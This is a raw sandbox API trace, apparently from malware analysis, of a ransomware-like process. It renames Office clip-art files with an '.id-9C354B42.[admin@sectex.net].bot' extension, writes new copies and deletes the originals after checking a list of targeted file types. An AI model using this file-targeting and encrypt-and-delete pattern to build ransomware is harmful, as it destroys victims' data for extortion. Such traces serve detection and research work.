	[0143.421] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.476] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf")) returned 1
	[0143.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63
	[0143.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63
	[0143.476] lstrlenW (lpString=".doc") returned 4
	[0143.476] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.476] lstrlenW (lpString=".docx") returned 5
	[0143.477] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.477] lstrlenW (lpString=".pdf") returned 4
	[0143.477] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.477] lstrlenW (lpString=".xls") returned 4
	[0143.477] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.477] lstrlenW (lpString=".xlsx") returned 5
	[0143.477] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.477] lstrlenW (lpString=".ppt") returned 4
	[0143.477] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63
	[0143.477] lstrlenW (lpString=".zip") returned 4
	[0143.477] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.477] lstrlenW (lpString=".rar") returned 4
	[0143.477] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.477] lstrlenW (lpString=".bz2") returned 4
	[0143.477] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.477] lstrlenW (lpString=".7z") returned 3
	[0143.477] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63
	[0143.477] lstrlenW (lpString=".dbf") returned 4
	[0143.477] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63
	[0143.477] lstrlenW (lpString=".1cd") returned 4
	[0143.477] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63
	[0143.477] lstrlenW (lpString=".jpg") returned 4
	[0143.477] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63
	[0143.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63
	[0143.477] lstrlenW (lpString=".doc") returned 4
	[0143.477] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.477] lstrlenW (lpString=".docx") returned 5
	[0143.477] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.477] lstrlenW (lpString=".pdf") returned 4
	[0143.478] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.478] lstrlenW (lpString=".xls") returned 4
	[0143.478] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.478] lstrlenW (lpString=".xlsx") returned 5
	[0143.478] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.478] lstrlenW (lpString=".ppt") returned 4
	[0143.478] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63
	[0143.478] lstrlenW (lpString=".zip") returned 4
	[0143.478] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.478] lstrlenW (lpString=".rar") returned 4
	[0143.478] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.478] lstrlenW (lpString=".bz2") returned 4
	[0143.478] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.478] lstrlenW (lpString=".7z") returned 3
	[0143.478] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63
	[0143.478] lstrlenW (lpString=".dbf") returned 4
	[0143.478] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63
	[0143.478] lstrlenW (lpString=".1cd") returned 4
	[0143.478] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63
	[0143.478] lstrlenW (lpString=".jpg") returned 4
	[0143.478] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.478] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.478] lstrlenW (lpString="BS00453_.WMF") returned 12
	[0143.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0143.479] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2436) returned 1
	[0143.479] CloseHandle (hObject=0x3a0) returned 1
	[0143.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf")) returned 0x20
	[0143.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0143.479] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.479] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.480] GetLastError () returned 0x0
	[0143.480] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x984, lpOverlapped=0x0) returned 1
	[0143.538] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x990, lpOverlapped=0x0) returned 1
	[0143.540] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.540] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.540] SetEndOfFile (hFile=0x388) returned 1
	[0143.540] CloseHandle (hObject=0x388) returned 1
	[0143.540] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.540] SetEndOfFile (hFile=0x3a0) returned 1
	[0143.542] CloseHandle (hObject=0x3a0) returned 1
	[0143.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.565] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf")) returned 1
	[0143.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63
	[0143.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63
	[0143.628] lstrlenW (lpString=".doc") returned 4
	[0143.628] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.628] lstrlenW (lpString=".docx") returned 5
	[0143.628] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.628] lstrlenW (lpString=".pdf") returned 4
	[0143.628] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.628] lstrlenW (lpString=".xls") returned 4
	[0143.628] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.628] lstrlenW (lpString=".xlsx") returned 5
	[0143.628] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.628] lstrlenW (lpString=".ppt") returned 4
	[0143.628] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63
	[0143.628] lstrlenW (lpString=".zip") returned 4
	[0143.628] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.628] lstrlenW (lpString=".rar") returned 4
	[0143.628] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.629] lstrlenW (lpString=".bz2") returned 4
	[0143.629] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.629] lstrlenW (lpString=".7z") returned 3
	[0143.629] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63
	[0143.629] lstrlenW (lpString=".dbf") returned 4
	[0143.629] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63
	[0143.629] lstrlenW (lpString=".1cd") returned 4
	[0143.629] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63
	[0143.629] lstrlenW (lpString=".jpg") returned 4
	[0143.629] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63
	[0143.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63
	[0143.629] lstrlenW (lpString=".doc") returned 4
	[0143.629] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.629] lstrlenW (lpString=".docx") returned 5
	[0143.629] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.629] lstrlenW (lpString=".pdf") returned 4
	[0143.629] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.629] lstrlenW (lpString=".xls") returned 4
	[0143.629] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.629] lstrlenW (lpString=".xlsx") returned 5
	[0143.629] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.629] lstrlenW (lpString=".ppt") returned 4
	[0143.629] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63
	[0143.629] lstrlenW (lpString=".zip") returned 4
	[0143.629] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.629] lstrlenW (lpString=".rar") returned 4
	[0143.629] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.629] lstrlenW (lpString=".bz2") returned 4
	[0143.630] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.630] lstrlenW (lpString=".7z") returned 3
	[0143.630] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63
	[0143.630] lstrlenW (lpString=".dbf") returned 4
	[0143.630] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63
	[0143.630] lstrlenW (lpString=".1cd") returned 4
	[0143.630] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63
	[0143.630] lstrlenW (lpString=".jpg") returned 4
	[0143.630] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.630] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.630] lstrlenW (lpString="BS01639_.WMF") returned 12
	[0143.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0143.630] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=4236) returned 1
	[0143.631] CloseHandle (hObject=0x39c) returned 1
	[0143.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf")) returned 0x20
	[0143.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0143.631] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.631] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0143.632] GetLastError () returned 0x0
	[0143.632] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x108c, lpOverlapped=0x0) returned 1
	[0143.779] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1090, lpOverlapped=0x0) returned 1
	[0143.780] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.780] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.780] SetEndOfFile (hFile=0x25c) returned 1
	[0143.780] CloseHandle (hObject=0x25c) returned 1
	[0143.780] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.780] SetEndOfFile (hFile=0x39c) returned 1
	[0143.783] CloseHandle (hObject=0x39c) returned 1
	[0143.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.796] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf")) returned 1
	[0143.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63
	[0143.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63
	[0143.796] lstrlenW (lpString=".doc") returned 4
	[0143.796] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.796] lstrlenW (lpString=".docx") returned 5
	[0143.796] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.796] lstrlenW (lpString=".pdf") returned 4
	[0143.797] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.797] lstrlenW (lpString=".xls") returned 4
	[0143.797] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.797] lstrlenW (lpString=".xlsx") returned 5
	[0143.797] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.797] lstrlenW (lpString=".ppt") returned 4
	[0143.797] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63
	[0143.797] lstrlenW (lpString=".zip") returned 4
	[0143.797] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.797] lstrlenW (lpString=".rar") returned 4
	[0143.797] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.797] lstrlenW (lpString=".bz2") returned 4
	[0143.797] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.797] lstrlenW (lpString=".7z") returned 3
	[0143.797] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63
	[0143.797] lstrlenW (lpString=".dbf") returned 4
	[0143.797] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63
	[0143.797] lstrlenW (lpString=".1cd") returned 4
	[0143.797] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63
	[0143.797] lstrlenW (lpString=".jpg") returned 4
	[0143.797] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63
	[0143.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63
	[0143.797] lstrlenW (lpString=".doc") returned 4
	[0143.797] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.797] lstrlenW (lpString=".docx") returned 5
	[0143.797] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.797] lstrlenW (lpString=".pdf") returned 4
	[0143.797] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.798] lstrlenW (lpString=".xls") returned 4
	[0143.798] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.798] lstrlenW (lpString=".xlsx") returned 5
	[0143.798] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.798] lstrlenW (lpString=".ppt") returned 4
	[0143.798] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63
	[0143.798] lstrlenW (lpString=".zip") returned 4
	[0143.798] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.798] lstrlenW (lpString=".rar") returned 4
	[0143.798] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.798] lstrlenW (lpString=".bz2") returned 4
	[0143.798] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.798] lstrlenW (lpString=".7z") returned 3
	[0143.798] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63
	[0143.798] lstrlenW (lpString=".dbf") returned 4
	[0143.798] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63
	[0143.798] lstrlenW (lpString=".1cd") returned 4
	[0143.798] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63
	[0143.798] lstrlenW (lpString=".jpg") returned 4
	[0143.798] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.798] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.798] lstrlenW (lpString="CUP.WMF") returned 7
	[0143.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.809] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2966) returned 1
	[0143.809] CloseHandle (hObject=0x2a0) returned 1
	[0143.809] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf")) returned 0x20
	[0143.909] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0143.954] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.954] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0143.955] GetLastError () returned 0x0
	[0143.955] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xb96, lpOverlapped=0x0) returned 1
	[0144.027] WriteFile (in: hFile=0x384, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xba0, lpOverlapped=0x0) returned 1
	[0144.028] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.028] WriteFile (in: hFile=0x384, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0144.028] SetEndOfFile (hFile=0x384) returned 1
	[0144.028] CloseHandle (hObject=0x384) returned 1
	[0144.028] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.028] SetEndOfFile (hFile=0x398) returned 1
	[0144.030] CloseHandle (hObject=0x398) returned 1
	[0144.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.031] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf")) returned 1
